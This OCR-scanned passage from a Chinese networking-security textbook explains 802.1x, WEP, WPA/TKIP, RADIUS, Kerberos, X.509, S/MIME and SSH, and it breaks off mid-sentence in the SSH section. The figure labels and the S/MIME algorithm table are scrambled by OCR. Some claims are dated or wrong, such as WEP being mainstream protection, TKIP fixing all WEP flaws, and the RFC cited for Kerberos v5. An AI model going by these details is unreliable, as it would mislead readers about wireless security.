交换 机 才 可 以 通过 或 者 屏蔽 用 户 发 送 过 来 的 信息 。 

图 3-71 为 802.1x 协议 的 体系 结构 ，PAE (PortAccessEntry) 端口 访问 实体 。 


r 
客户 端 认证 系统 | 认证 服务 器 
客户 端 PAE 设备 提供 的 服务 设备 端 PAE | + 认证 服务 器 


BE 有 受 控 端口 非 受 控 端口 A 


局 域 网 /无 线 局 域 网 


图 3-71 802.1x 协议 的 体系 结构 
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完成 IEEE802.1x 认证 过 程 有 三 个 必 不 可 少 的 部 分 : 

@ 认证 系统 (AuthenticatorSystem): 一 般 为 接 入 控制 设备 ,在 接 入 设备 和 认证 服务 
器 之 间 转 发 认证 信息 ， 根 据 认 证 结果 设置 端口 状态 。 

D 客户 端 系统 (SupplicantSystem): 被 认证 的 用 户 接 入 设备 。 

© 认证 服务 器 (AuthenticationSever): 认证 服务 器 ， 是 对 请 求 访问 网 络 资源 的 用 户 
设备 进行 实际 认证 的 设备 。 认 证 服务 器 可 以 是 本 地 的 ， 也 可 以 是 远程 的 。 

IEEE802.1x 的 认证 过 程 〈 图 3-72) 如 下 : 


EAPOL EAPOR 


EAPOL-Start ai] 
ES EAP-Request / Identity 
Radius Access Request 
EAP-Response/ Identity (EAP-Request /Identity) 
=| = 
Radius Access -Challenge 
HA EAP-Request /MD5Challenge (EAP-Request/MD5Challengà 
| 一 
Radius Access -Request 
EAP-Response/MD5 Challenge (EAP-Request /MDS Challenge ) 
一 | 
Radius Access-Accept 
EAP-Success (EAP-Success) 
上 一 
端口 被 授权 
握 帮 定时 周期 
|a EAP-Request /Identity 
EAP-Response / Identity 
EAPOL-Logoff 
一 
端 品 非 授权 


图 3-72 IEEE802.1x 的 认证 过 程 


© 用 户 使 用 802.1x 客户 端 程序 ， 发 起 连接 请 求 。 此 时 ， 客 户 端 程序 将 发 出 
EAPOL-Start 报 文 给 认证 系统 (交换 机 )， 开 始 一 次 认证 过 程 。 

@ 认证 系统 收 到 请 求 认证 的 数据 报 文 后 ， 将 发 出 一 个 EAP-Request/Identity 请 求 报 
文 给 用 户 的 客户 端 ， 要 求 客户 端 程序 发 送 用 户 输入 的 用 户 名 。 


PA 
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© 客户 端 程序 响应 认证 系统 发 出 的 请 求 , 将 用 户 名 信息 通过 EAP-Response/Identity 
报 文 发 给 认证 系统 。 认 证 系统 将 客户 端 送 上 来 的 数据 报 文 转发 给 认证 服务 器 进行 处 理 。 

@ 认证 服务 器 收 到 认证 系统 转发 上 来 的 用 户 名 信息 后 ， 用 随机 生成 的 一 个 加 密 字 
对 它 进行 加 密 处 理 ， 同 时 也 将 此 加 密 字 封 装 成 数据 报 文 传送 给 认证 系统 ， 由 认证 系统 将 
数据 报 文 传 给 客户 端 程序 。 

@@ 客户 端 程序 收 到 由 认证 系统 传 来 的 加 密 字 后 ， 用 该 加 密 字 对 口令 部 分 进行 加 密 
处 理 〈 如 计算 其 hash 值 )， 返 回 EAP-Response 报 文 并 通过 认证 系统 传 给 认证 服务 器 。 

© 认证 服务 器 收 到 认证 系统 转发 的 加 密 后 的 口令 信息 后 ， 将 其 和 自己 经 过 加 密 运 
算 后 的 口令 信息 进行 比较 ， 如 果 匹 配 ， 则 认为 该 用 户 为 合法 用 户 ， 反 馈 EAP-Success 认 
证 成 功 信息 ， 认 证 系统 打开 端口 ， 用 户 可 以 访问 网 络 。 和 否则 ， 反 馈 EAP-Failure 认证 失 
败 的 消息 ， 并 保持 交换 机 端口 的 关闭 状态 ， 只 允许 认证 信息 数据 通过 而 不 允许 业务 数据 

@ 客户 端 发 送 EAPOL-LOGOFF 报 文 ， 认 证 结束 。 
3.4.5.6 WEP 

为 了 提高 无 线 网 络 的 安全 性 , 防止 无 线 网 络 用 户 被 窃听 , IEEE 引入 了 有 线 等 价 保密 
CWEP) 算法 。WEP 协议 原理 : WEP 基于 RC4 算法 用 相同 的 密 钥 加 密 和 人 解密， 用 开放 
系统 认证 和 共享 密 钥 认证 进行 认证 。 

1. 加密 

O 计算 校 验 和 。 计 算 明文 的 32bitCRC 循环 元 余 校 验 码 ， 生 成 完整 性 校 验 值 ICV. 

© 生成 伪 随 机 数 序列 。 客 户 端 STA 和 接 入 点 AP 间 共 享 密 钥 KK, 长 40bit, 它 与 24bit 
初始 向 量 TV 连接 , 构成 64bit 种 子 密 钥 。 将 种 子 密 钥 送 入 采用 RC4 算法 的 伪 随机 数 发 生 
器 PRNG， 产 生 伪 随机 数 序列 。 

© 生成 密 文 。 明 文 与 ICV 连接 ， 和 伪 随 机 数 序列 异 或 ， 产 生 密 文 。 

2. 解密 

O 生成 解密 伪 随 机 数 序列 。 从 接收 数据 包 中 提取 IV 和 密 文 ，K 与 IV 联接 ， 输 入 
PRNG， 得 解密 伪 随 机 数 序列 。 

© 生成 明文 。 解 密 伪 随 机 数 序列 和 密 文 异 或 ， 得 到 明文 及 CRC 校 验 和 ICV。 

@ 完整 性 检测 。 计 算 CRC 校 验 和 ， 得 新 完整 性 校 验 值 ICV'。 若 ICV'=ICV， 则 通 
过 校 验 ， 否则 丢弃 该 数据 包 。 

3. 身份 认证 

开放 系统 认证 不 要 身份 认证 ,甚至 不 要 STA 提供 正确 身份 信息 ， 所 以 不 安全 保留 它 
是 为 了 方便 使 用 。 共 享 密 钥 认 证 的 共享 密 钥 与 加 解密 的 40bit 密 钥 相同 。 过 程 如 下 : 

Q@ STA 发 送 认证 请 求 到 AP。 

© AP 收 到 请 求 后 返回 一 随机 序列 。 

@ STA 用 共享 密 钥 产生 密 钥 流 加 密 该 随机 序列 ， 并 将 密 文 发 给 AP. 
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@ AP 用 共享 密 钥 产 生 密 钥 流 对 密 文 解密 ， 解 密 结 果 与 随机 序列 比较 ， 若 相同 ， 则 
WERD; 否则 失败 。 

WEP 是 现在 WLAN 应 用 中 主流 的 安全 防护 手段 ， 但 是 WEP 并 没有 具体 地 规定 共 
享 密 钥 是 如 何 生成 ， 如 何 向 外 分 发 ， 如 何在 密 钥 泄露 以 后 更 改 密 钥 ， 如 何 定期 地 来 实现 
密 钥 的 更 新 、 密 钥 的 备份 、 密 钥 的 恢复 。 这 种 密 钥 管理 体制 造成 了 WLAN 的 安全 风险 。 
IEEE802.11 标准 指出 ，WEP 使 用 的 密 钥 需要 接受 一 个 外 部 密 钥 管理 系统 的 控制 ， 
并 且 最 多 可 以 有 4 个 保存 在 全 局 共享 数组 里 的 密 钥 .每 个 传送 报 文 包含 一 个 密 钥 标识 符 ， 
可 以 用 来 指示 加 密 密 钥 的 索引 。 这 些 密 钥 之 间 的 变化 可 以 减少 IV 冲突 的 数量 ， 使 得 黑 
客 难 以 攻破 无 线 通信 网 络 。 然 而 许多 在 家 庭 和 办 公 室 部 署 无 线 网 络 的 人 都 趋向 于 使 用 缺 
省 的 WEP 密 钥 ， 从 而 也 带 来 安全 风险 。 

Cisco CHEP 针对 WEP 的 密 钥 管 理 系统 中 缺少 可 靠 性 身份 验证 的 问题 ， 制 定 了 一 
个 基于 可 扩展 身份 验证 协议 的 身份 验证 方案 ， 通 常 被 称 为 LEAP 
(LightweightExtensibleAuthenticationProtocol)。 这 个 方案 提供 了 标准 中 制定 的 外 部 密 钥 管 
理 系统 ， 并 且 提 供 了 一 些 额外 的 特征 ， 例 如 在 24 位 IV 密 钥 空 间 用 尽 的 时 候 ， 自 动 生成 
一 个 新 的 会 话 密 钥 。 每 个 用 户 、 每 次 通信 用 一 次 的 WEP 键 值 ， 由 系统 自行 产生 ， 系 统 
管理 者 完全 不 需 介 入 。 每 个 通信 过 程 中 , 用 户 都 会 收 到 独一无二 的 WEP， 而 且 不 会 跟 其 
他 人 共享 。 在 将 WEP 广播 送出 之 前 ， 还 会 以 LEAP 加 密 一 次 ， 只 有 拥有 相对 应 键 值 的 
人 ， 才 能 存 取 信息 。 
3.4.5.7 WPA 

WPA (Wi-FiProtectedAccess) 是 继承 了 WEP 基本 原理 而 又 解决 了 WEP 缺点 的 一 种 
新 技术 。 由 于 加 强 了 生成 加 密 密 钥 的 算法 ， 因 此 即便 收集 到 分 组 信息 并 对 其 进行 解析 ， 
也 几乎 无 法 计算 出 通用 密 钥 。WEP 是 数据 加 密 算法 ， 它 不 是 一 个 用 户 认证 机 制 。WPA 
用 户 认 证 是 使 用 802.1x 和 扩展 认证 协议 EAP(ExtensibleAuthenticationProtocol, RFC2284 ) 
来 实现 的 。 

在 802.11 标准 里 , 802.1x 身份 认证 是 可 选项 ; 在 WPA 里 802.1x 身份 认证 是 必 选 项 。 

对 于 加 密 ，WPA 使 用 临时 密 钥 完整 性 协议 TKIP (TemporalKeyIntegrityProtocol) 的 
加 密 是 必 选 项 。TKIP 使 用 一 个 新 的 加 密 算法 取代 了 WEP, HE WEP 的 加 密 算法 更 强壮 ， 
同时 还 能 使 用 现 有 的 无 线 硬件 上 提供 的 计算 工具 去 实行 加 密 的 操作 。TKIP 提供 的 重要 的 
数据 加 密 增 强 型 内 容 包括 : 每 包 密 钥 混合 功能 (perpacketkeymixing)、 称 为 Michael 的 
信息 完整 性 检查 MIC (messageintegritycheck )、 有 先后 次 序 规则 的 扩展 初始 向 量 
(extendedinitializationvectorlV) 和 再 生 密 钥 机 制 。 通 过 这 些 增强 量 ，TKIP 弥补 了 WEP 
所 有 的 弱点 。 

WPA 标准 里 包括 了 下 述 安全 特性 : 

@ WPA 认证 ， 其 改善 了 我 们 所 熟知 的 WEP 的 大 部 分 弱点 ， 它 主要 是 应 用 于 公司 
内 部 的 无 线 基 础 网 络 。 无 线 基础 网 络 包括 : 工作 站 、 无 线 访问 节点 AP (AccessPoint) 和 
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认证 服务 器 (典型 的 RADIUS 服务 器 )。 在 无 线 用 户 访问 网 络 之 前 ，RADIUS 服务 掌控 
用 户 信 任 和 认证 无 线 用 户 。 

© WPA 加 密 密 钥 管理 ， 包 括 : 临时 密 钥 完整 性 协议 〈TKIP Temporal 
KeyIntegrityProtocol), Michael 消息 完整 性 编码 CMIC) 和 AES 支持 〈 逐 步 采 用 )。WPA 
的 优势 来 自 于 一 个 完整 的 包含 802.1x/EAP 认证 和 智慧 的 密 钥 管理 和 加 密 技术 的 操作 次 
序 。 它 主要 的 作用 包括 : 网 络 安全 性 能 的 可 确定 和 认证 。 在 工作 站 客户 端 程序 Csupplicant) 
使 用 包含 在 信息 元 素 里 的 认证 和 密码 套件 信息 去 判断 哪些 认证 方法 和 加 密 套 件 是 使 
用 的 。 

临时 密 钥 完整 性 协议 (TKIP) 可 改变 每 一 个 帧 的 单 播 加 密 密 铀 ， 并 且 每 次 更 改 都 在 
无 线 客户 端 和 无 线 AP 之 间 同 步 进行 。WPA 包括 一 个 能 灵活 的 将 无 线 AP 变换 的 全 局 加 
密 密 钥 ， 告 之 相关 连接 的 无 线 客户 端 。 

如 果 设 置 成 执行 动态 密 钥 交换 ，802.1x 认证 服务 器 可 以 把 返回 信息 密 钥 和 允许 信息 
一 起 交 给 AP. AP 在 发 送 安全 消息 给 客户 端 之 后 ， 使 用 信息 密 钥 去 构筑 ， 标 记 和 加 密 一 
个 EAP 密 钥 消息 。 客户 端 因 此 可 以 使 用 密码 消息 的 内 容 去 定义 可 适用 的 加 密 密 钥 。 在 典 
型 的 802.1x 环境 里 ， 客 户 端 根据 需要 能 频繁 地 自动 改变 加 密 密 钥 ， 从 而 将 黑客 破解 当前 
所 使 用 的 密 匙 的 可 能 性 降 到 最 小 。 
3.4.5.8 RADIUS 

RADIUS ( RemoteAuthenticationDialInUserService )， 即 远程 认证 接 入 用 户 服务 
(RFC2865/RFC2866)。 它 最 初 是 由 Livingston 公司 〈 现 已 并 入 LucentInternet-working 
System 公司 ) 开发 ， 作 为 一 种 客户 机 /服务 器 模式 的 安全 协议 ， 后 由 Merit 大 学 进行 了 功 
能 的 扩展 ， 逐 渐 成 为 一 种 接 入 Internet 的 认证 / 计 费 协议 。 

总 的 说 来 ，RADIUS 协议 是 一 种 提供 在 网 络 接 入 服务 器 (NetworkAccessServer) 和 
共享 认证 服务 器 间 传 送 认证 、 授权 和 配置 信息 等 服务 的 协议 RADIUS 使 用 UDP 作为 其 
传输 协议 。 

RADIUS 由 客户 端 和 服务 器 两 部 分 组 成 ， 客 户 端 向 服务 器 发 送 认 证 和 计 费 请 求 ， 服 
务 器 向 客户 端 回 送 接受 或 否定 消息 ， 客 户 和 服务 器 之 间 的 通信 用 共享 密 钥 来 加 密 信息 后 
通过 网 络 传送 。 

RADIUS 认证 / 计 费 工作 原理 过 程 如 图 3-73 所 示 。 

RADIUS 认证 过 程 如 下 : 

O 在 一 个 客户 端 被 设置 使 用 RADIUS 协议 后 ， 任 何 使 用 这 个 终端 的 用 户 都 需要 向 
客户 端 提供 认证 信息 。 提示 用 户 需要 输入 用 户 名 和 密码 ; 也 可 以 选择 一 种 配置 连接 协议 。 
一 旦 RADIUS 客户 端 收 到 此 类 信息 , 它 会 选择 使 用 RADIUS 协议 进行 认证 ,创建 一 个 “ 接 
入 请 求 ” 报 文 ， 报 文 包含 了 如 用 户 名 、 用 户 密 码 (MD5 加 密 )、 客 户 机 ID、 用 户 正 在 访 
问 的 端口 编号 等 。 然 后 “ 接 入 请 求 ” 通 过 网 络 提交 给 RADIUS 服务 器 。 
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图 3-73 RADIUS 认证 / 计 费 工作 原理 
@ RADIUS 服务 器 收 到 请 求 信息 ， 将 对 传输 信息 的 客户 端 进行 验证 。 如 果 是 一 个 


来 自 没 有 与 RADIUS 服务 器 具有 共享 机 密 的 客户 端 请 求 ， 该 数据 包 会 丢弃 。 如 果 客 户 端 
合法 ，RADIUS 服务 器 查询 用 户 数据 库 找到 该 用 户 ， 并 进行 比较 。 如 果 有 任 一 条 件 未 满 
Ati, RADIUS 服务 器 会 发 出 “ 接 入 拒绝 (Access-Reject)” 响 应 ， 表 示 该 用 户 请 求 无 效 。 

@ 如 果 所 有 的 条 件 满 足 ，RADIUS 服务 器 将 发 出 “ 接 入 盘问 (AccessChallenge)” 
响应 ， 通 过 客户 端 以 文本 信息 形式 显示 给 用 户 响 应 提示 ， 用 户 必须 做 出 回应 。 客 户 端 需 
再 次 提交 一 个 包含 新 请 求 号 的 源 接 入 请 求 ， 并 用 加 密 响应 代替 用 户 密码 属性 。 服 务 器 可 
以 用 “ 接 入 接受 〈Access-Accept)”“ 接 入 拒绝 (Access-Reject)” 或 “ 接 入 盘问 
(Access-Challenge)” 对 这 个 新 接 入 请 求 进行 响应 。 

@ 如 果 所 有 的 条 件 都 被 满足 ， 用 户 的 配置 值 表 被 置 于 “ 接 入 允许 ”响应 中 。 

RADIUS 计 费 过 程 这 里 从 略 。 
3.4.5.9 Kerberos 

Kerberos 是 一 种 应 用 于 分 布 式 网 络 环境 、 以 对 称 密码 体制 为 基础 ， 对 用 户 及 网 络 连 
接 进行 认证 的 增强 网 络 安全 的 服务 。 该 协议 是 20 世纪 80 年 代 中 期 麻 省 理工 学 院 (MIT， 
MassachusettsInstituteofTechnology)“ 雅 典 娜 计划 (ProjectArhena)” 的 一 部 分 ， 是 基于 
Needham-Schroeder 协议 的 变形 。 

Kerberos 阐述 了 这 样 一 个 问题 假设 有 一 个 开放 的 分 布 环境 ， 工 作 站 用 户 想 通 过 网 
络 对 分 布 在 网 络 中 的 各 种 服务 提出 请 求 , 那么 , 希望 服务 器 能 够 只 对 授权 用 户 提 供 服 务 ， 
并 能 鉴别 服务 请 求 的 种 类 。 但 在 这 种 环境 下 ， 一 个 工作 站 无 法 准确 判定 它 的 终端 用 户 和 
请 求 的 服务 是 否 合法 。 特 别 是 存在 以 下 三 种 威胁 : 

© 用 户 可 能 通过 某 种 途径 进入 工作 站 并 假装 成 其 他 用 户 访问 工作 站 。 

@ 用 户 可 以 通过 变更 工作 站 的 网 络 地 址 ， 从 该 机 上 可 以 发 送 伪造 的 消息 。 

@ 用 户 可 以 监听 信息 交换 或 使 用 重 放 攻击 获得 服务 或 干扰 操作 。 

在 上 述 任何 一 种 情况 下 ， 一 个 非 授权 用 户 均 可 能 获得 未 授权 的 服务 或 数据 。 针 对 上 
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述 情 况 ，Kerberos 通过 提供 一 个 集中 的 授权 服务 器 来 管理 用 户 对 服务 器 的 鉴别 和 服务 器 
对 用 户 的 鉴别 ， 而 不 是 为 每 个 服务 器 提供 详细 的 授权 协议 。 与 其 他 授权 模式 不 同 的 是 ， 
Kerberos 仅仅 依赖 于 对 称 加 密 体 制 而 没有 使 用 公 钥 加 密 体制 。 

Kerberos 的 基本 原理 是 : 在 网 络 上 建立 一 个 集中 保存 用 户 名 和 密码 的 认证 中 心 KDC 
(包含 认证 服务 器 AS ( AuthenticationServer ) 和 票证 发 放 服 务 器 TGS 
(TicketGrantingServer))， 进 行 用 户 的 身份 验证 和 授权 。 任 何 用 户 在 申请 任何 服务 时 ， 都 
通过 这 个 中 心 取得 服务 的 使 用 权 。 提 供 各 类 服务 的 服务 器 不 再 直接 进行 用 户 身份 验证 和 
授权 ， 而 是 根据 认证 中 心 提供 的 票据 向 指定 用 户 提供 服务 。 在 用 户 、 认 证 中 心 、 服 务 提 
供 服 务 器 三 者 间 的 通信 ， 都 采用 数据 加 密 标准 DES) 加 密 算 法 进行 加 密 。 

Kerberos 协议 具体 实现 过 程 如 图 3-74 所 示 。 


1. 请 求 票据 许可 证 
2. 票据 许可 证 

3. 请 求 服务 票据 
4. 服务 票据 

5. 请 求 服务 

6. 提供 双向 认证 


图 3-74 Kerberos 协议 具体 实现 过 程 


© 客户 端 请 求 认 证 服务 器 CAS) 发 给 接 入 TGS 的 票据 。 

@ AS 在 数据 库 中 查找 用 户 实体 ， 并 产生 一 个 会 话 密 钥 ， 并 用 用 户 秘密 密 钥 对 会 话 
密 钥 加 密 。 接 着 ，AS 把 实体 名 、 地 址 、TGS 名 、 时 间 戳 、 时 限 及 会 话 密 钥 打包 成 TGT 
(票据 分 配 许可 证 )， 并 用 TGS 的 秘密 密 钥 进行 加 密 。 然 后 将 会 话 密 钥 和 TGT 发 给 客 
户 端 。 

© 客户 端 将 第 一 个 报 文 解 密 得 到 会 话 密 钥 ， 并 生成 一 个 认证 单 。 然 后 向 TGS 申请 
接 入 目标 服务 器 的 票据 。 

@ TGS 用 其 秘密 密 钥 对 TGT 进行 解密 ， 使 用 TGT 的 会 话 密 钥 对 认证 单 进 行 解密 ， 
然后 将 认证 单 的 信息 与 TGT 的 信息 进行 比较 。 此 时 ，TGS 产生 新 的 会 话 密 钥 供 双方 使 
用 , 利用 用 户 实体 与 TGS 的 会 话 密 钥 对 新 的 会 话 密 钥 加 密 ， 并 将 新 的 会 话 密 钥 加 入 客户 
端 提交 给 服务 器 的 有 效 票 据 中 ， 并 用 目标 服务 器 的 秘密 密 钥 对 此 票据 加 密 ， 最 后 将 这 两 
个 报 文 提交 给 客户 。 

© 客户 端 将 收 到 的 报 文 解 密 后 ， 获 得 与 目标 服务 器 共同 的 会 话 密 钥 。 然 后 客户 端 
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生成 一 个 新 的 认证 单 ， 并 用 新 会 话 密 钥 对 其 进行 加 密 。 最 后 将 此 认证 单 与 从 TGS 收 到 的 
票据 一 并 发 给 目标 服务 器 。 

© 目标 服务 器 对 票据 和 认证 单 进行 解密 ， 并 检查 其 地 址 、 时 间 戳 、 时 限 等 信息 。 
如 果 一 切 都 正确 ， 服 务 器 则 知道 用 户 实体 的 身份 。 此 后 的 通信 ， 客 户 端 可 以 与 目标 服务 
器 共享 一 个 秘密 密 钥 进行 安全 通信 。 

目前 常用 的 Kerberos 有 两 个 版 本 。 版 本 4[MILL88，STEI88] 被 广泛 使 用 ， 而 版 本 
5[KOHL94] 改 进 了 版 本 4 中 的 安全 性 ， 并 成 为 nternet 标准 草案 (RFC1550)。 
3.4.5.10 X.509 

X.509 是 由 国际 电信 联盟 CITU-T) 制定 的 数字 证 书 标准 。 为 了 提供 公用 网 络 用 户 目 
录 信 息 服务 ,ITU 于 1988 年 制定 了 X.500 系列 标准 。 实 际 上 ， 目 录 是 指 管理 用 户 信息 数 
据 库 的 服务 器 或 一 组 分 布 服务 器 ， 用 户 信息 包括 用 户 名 到 网 络 地 址 的 映射 等 用 户 信息 或 
其 他 属性 。X.500 系列 标准 中 X.500 和 X.509 是 安全 认证 系统 的 核心 。X.500 定义 了 一 种 
区 别 命名 规则 ， 以 命名 树 来 确保 用 户 名 称 的 唯一 性 。X.509 则 为 X.500 用 户 名 称 提 供 了 
通信 实体 鉴别 机 制 ， 并 规定 了 实体 鉴别 过 程 中 广泛 适用 的 证 书 语法 和 数据 接口 ，X.509 
称 之 为 证 书 。 

X.509 定义 了 X.500 用 户 目 录 的 一 个 认证 服务 框架 ， 该 目录 可 以 提供 公 钥 证 书库 类 
型 的 服务 ,每 个 证 书包 含 该 用 户 的 公 钥 并 由 一 个 可 信 的 认证 中 心 用 私 钥 签名 。 另 外 ,X.509 
还 定义 了 基于 使 用 公 钥 证 书 的 一 个 认证 协议 。 

X.509 是 基于 公 钥 密码 体制 和 数字 签名 的 服务 。 其 标准 中 并 未 规定 使 用 某 个 特定 的 
算法 , 但 推荐 使 用 RSA。 其 数字 签名 需要 用 到 HASH 函数 , 但 并 没有 规定 具体 的 HASH 
算法 。1988 年 的 建议 书 中 推荐 的 HASH 算法 被 证 明 不 安全 后 ， 在 1993 年 的 建议 书 中 被 
删除 。 

X.509 给 出 的 鉴别 框架 是 一 种 基于 公开 密 钥 体制 的 鉴别 业务 密 钥 管理 。 一 个 用 户 有 
两 把 密 钥 : 一 把 是 用 户 的 专用 密 钥 ， 另 一 把 是 其 他 用 户 都 可 利用 的 公开 密 钥 。 用 户 可 用 
常规 密 钥 〈 如 DES) 为 信息 加 密 ， 然 后 再 用 接收 者 的 公 钥 对 DES 进行 加 密 并 将 之 附 于 
信息 之 上 ， 这样 接收 者 可 用 对 应 的 专用 密 钥 打开 DES 密 锁 ， 并 对 信息 解密 。 该 鉴别 框架 
允许 用 户 将 其 公开 密 钥 存放 在 它 的 目录 项 中 。 一 个 用 户 如 果 想 与 另 一 个 用 户 交 换 秘密 信 
息 ， 就 可 以 直接 从 对 方 的 目录 项 中 获得 相应 的 公开 密 钥 ， 用 于 各 种 安全 服务 。 

采用 X.509 电子 证 书 的 认证 系统 ， 是 公认 可 靠 的 认证 机 制 ， 其 安全 性 是 建立 在 牢固 
的 数学 基础 上 ， 经 过 多 年 的 使 用 始终 没有 失效 。 现 在 ，X.509 已 成 为 最 广泛 接受 的 基于 
公共 密 钥 的 证 书 格式 ，X.509 证 书 主 要 由 用 户 公共 密 钥 与 用 户 标识 符 组 成 。 

目前 ，X.509 标准 已 在 编排 公共 密 钥 格式 方面 被 广泛 接受 ， 已 用 于 许多 网 络 安全 应 
用 程序 ， 其 中 包括 IP 安全 (IPSec)、 安 全 套 接 层 (SSL)、 安 全 电子 交易 “SET)、 安 全 
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多 媒体 INTERNET 邮件 扩展 (S/MIME) 等。 
图 3-75 是 各 个 版 本 的 X.509 证 书 结构 图 。 


签名 算法 标识 符 “ 


有 效 其 结束 时 间 


主体 名 称 


主体 的 公 钥 信息 


图 3-75 X.509 证 书 结构 图 


3.4.5.11 S/MIME 
S/MIME (Secure/MultipurposeInternetMailExtension) 在 RSA 数据 安全 性 的 基础 上 ， 
加 强 了 互联 网 E-Mail 格式 标准 MIME 的 安全 性 。 虽 然 PGP 和 S/MIME 都 是 IETF 工作 
组 推出 的 标准 , 但 S/MIME 侧重 于 作为 商业 和 团体 使 用 的 工业 标准 , 而 PGP 则 倾向 于 为 
许多 用 户 提 供 个 人 E-Mail 的 安全 性 。RFC 为 S/MIME 定义 了 许多 文档 ， 重 要 的 有 
RFCs3369、RFCs3370、RFCs3370、RFCs3850 和 RFCs3851。 
S/MIME 提供 如 下 功能 : 
。 封装 数据 : 由 任何 类 型 的 加 密 内 容 和 加 密 该 内 容 所 用 的 加 密 密 钥 组 成 ， 密 钥 可 以 
是 与 一 个 或 多 个 接收 方 对 应 的 多 个 密 钥 。 
。 签名 数据 : 数字 签名 通过 提取 待 签名 内 容 的 数字 摘要 ， 并 用 签名 者 的 私 钥 加 密 得 
到 。 然 后 ， 用 base64 编码 方法 重新 对 内 容 和 签名 编码 。 因 此 ， 一 个 签名 了 的 数据 
消息 只 能 被 具有 S/MIME 能 力 的 接收 方 处 理 。 
。 透明 签名 数据 : 签名 的 数据 形成 了 内 容 的 数字 签名 。 但 在 这 种 情况 下 ， 只 有 数字 
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签名 采用 了 base64 编码 , 因此 没有 S/MIME 功能 的 接收 方 虽然 无 法 验证 签名 但 却 
可 以 看 到 消息 内 容 。 

。 签名 并 封装 数据 : 仅 签 名 实体 和 仅 封 装 实体 可 以 撕 套 ， 能 对 加 密 后 的 数据 进行 签 
名 和 对 签名 数据 或 透明 签名 数据 进行 加 密 。 

S/MIME 中 使 用 的 密码 算法 如 表 3-13 所 示 。 


表 3-13 S/MIME 中 使 用 的 密码 算法 


D Æ 要 R 
ee 必须 支持 SHA-1， 接 收 方 应 该 支持 MD5， 以 便 向 后 兼容 
创建 用 于 数字 签名 的 数字 捕 要 | 发 送 代理 和 接收 代理 必须 支持 DSS 
23 发 送 代理 应 该 支持 RSA 加 密 
z 成 数字 多 R 
加 密 数字 摘要 形成 数字 签名 。。 | 接收 代理 应 该 支持 验证 密 钥 大 小 在 512 位 至 1024 位 的 RSA 签名 
发 送 代理 和 接收 代理 必须 支持 Diffie-Hellman 
为 传送 消息 加 密会 话 密 钥 发 送 代 理应 该 支持 密 钥 大 小 在 512 位 至 1024 位 的 RSA 加 密 


接收 代理 应 该 支持 RSA 解密 

发 送 代理 和 接收 代理 必须 支持 3DES 

发 送 代理 必须 支持 AES 加 密 ， 应 该 支持 RC2/40 解密 
接收 代理 必须 支持 SHA-1HMAC 

接收 代理 应 当 支 持 SHA-1HMAC 


用 一 次 性 会 话 密 钥 加 密 消息 


创建 一 个 消息 鉴定 代码 


3.4.5.12 SSH 

SSH (SecureShell) 协议 是 在 传输 层 与 应 用 层 之 间 的 加 密 隧 道 应 用 协议 ， 它 从 几 个 
不 同 的 方面 来 加 强 通 信 的 完整 性 和 安全 性 。SSH 协议 有 三 部 分 〈 层 次 ) 组 成 : 传输 层 协 
议 (TransportLayerProtocol )、 用 户 认证 协议 (UserAuthenticationProtocol)、 连 接 协议 
(ConnectionProtocol)。 三 个 组 成 部 分 之 间 的 关系 如 图 3-76 所 示 。 


高 屋 应 用 协议 


连接 协议 (Connection Protocol ) 
| 用 户 认证 协议 《User Authentication Protocol) | 


| 传输 层 协 议 《Transport Layer Protocol) | 
| 可 靠 连接 (TCP over IP) | 


图 3-76 SSH 层次 结构 


1. 传输 层 协 议 (SSH-TRANS) 

SSH 传输 层 协 议 负 责 进行 服务 器 认证 、 数 据 机 密 性 、 信 息 完整 性 等 方面 的 保护 ， 并 
提供 作为 可 选项 的 数据 压缩 功能 ， 以 便 提高 传输 速度 。 另 外 ， 在 传输 层 协议 上 还 提供 密 
钥 交 换 功 能 。 传 输 层 协议 为 会 话 提供 了 对 称 加 密 ， 支 持 IDEA, Blowfish 和 Twofish, fE] 
时 为 以 后 支持 PKI 提供 了 接口 。 
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2. 用 户 认 证 协议 (SSH-USERAUTH) 

用 户 认 证 协议 是 建立 在 传输 层 协议 之 上 的 。 在 进行 用 户 认 证 之 前 ， 假 定 传输 层 协 议 
己 提 供 了 数据 机 密 性 和 完整 性 保护 。 用 户 认证 协议 接受 传输 层 协 议 确 定 的 会 话 ID， 作 为 
本 次 会 话 过 程 的 唯一 标识 。 服 务 器 端 首先 向 客户 端 发 起 用 户 认证 ， 他 会 告诉 客户 端 他 所 
支持 的 认证 算法 ,以便 客 户 端 进行 选择 。 认证 有 一 定 的 时 限 以 及 失败 认证 时 尝试 的 次 数 ， 
一 旦 用 户 认证 成 功 ， 服 务 器 端 会 根据 客户 端 所 提出 的 请 求 启动 相应 的 服务 。SSH 支持 多 
种 认证 方式 : 用 户 密码 、 公 和 钥 认证 、CA 等 。 可 以 单独 使 用 一 种 认证 方式 ， 也 可 以 多 种 
认证 方式 共同 使 用 。 

3. 连接 协议 (SSH-CONNECT) 

连接 协议 是 运行 在 SSH 传输 层 协 议和 用 户 认证 协议 之 上 , 提供 交互 式 登 录 会 话 ( 即 
Shell 会 话 ), 远程 命令 的 执行 , 转交 TCP/IP 连接 以 及 转交 X11 连接 。 所 有 的 终端 会 话 和 
转交 连接 等 都 是 隧道 , 通过 将 加 密 隧道 复 用 成 多 个 逻辑 隧道 , 提供 给 高 层 应 用 协议 使 用 。 
SSH2.0 提供 了 交互 会 话 、 远 程 命令 执行 和 转发 包括 X11 和 其 他 TOP 流量 传输 的 连接 等 
处 理 功能 ， 这 些 都 被 认为 是 通道 。 一 个 单一 的 会 话 连 接 可 以 处 理 多 个 通道 ， 这 项 工作 由 

SSH 连接 建立 过 程 : 

(1) 协议 版 本 协商 

由 于 SSH 具有 多 种 不 同 的 版 本 , 两 个 SSH 协议 首先 要 确认 这 次 通讯 使 用 何 种 版 本 。 
具体 过 程 是 ， 客 户 端 向 服务 端 发 出 TCP 请 求 ， 服 务 端 响应 客户 端的 TCP 请 求 ， 并 告诉 
客户 端 其 自身 的 协议 版 本 号 和 软件 版 本 号 ， 客 户 端 根 据 服务 端 和 自己 的 协议 版 本 号 和 软 
件 版 本 号 决定 使 用 哪 种 协议 版 本 号 和 软件 版 本 号 进行 此 次 通讯 ， 一 般 取 客户 端 和 服务 端 
最 低 或 互相 兼容 的 协议 版 本 号 和 软件 版 本 号 。 这 个 过 程 是 以 明文 传送 。 

(2) 会 话 加 密 初始 化 

SSH 通讯 使 用 会 话 密 钥 保证 传输 加 密 ， 这 一 阶段 是 产生 会 话 密 钥 的 过 程 。 由 于 考虑 
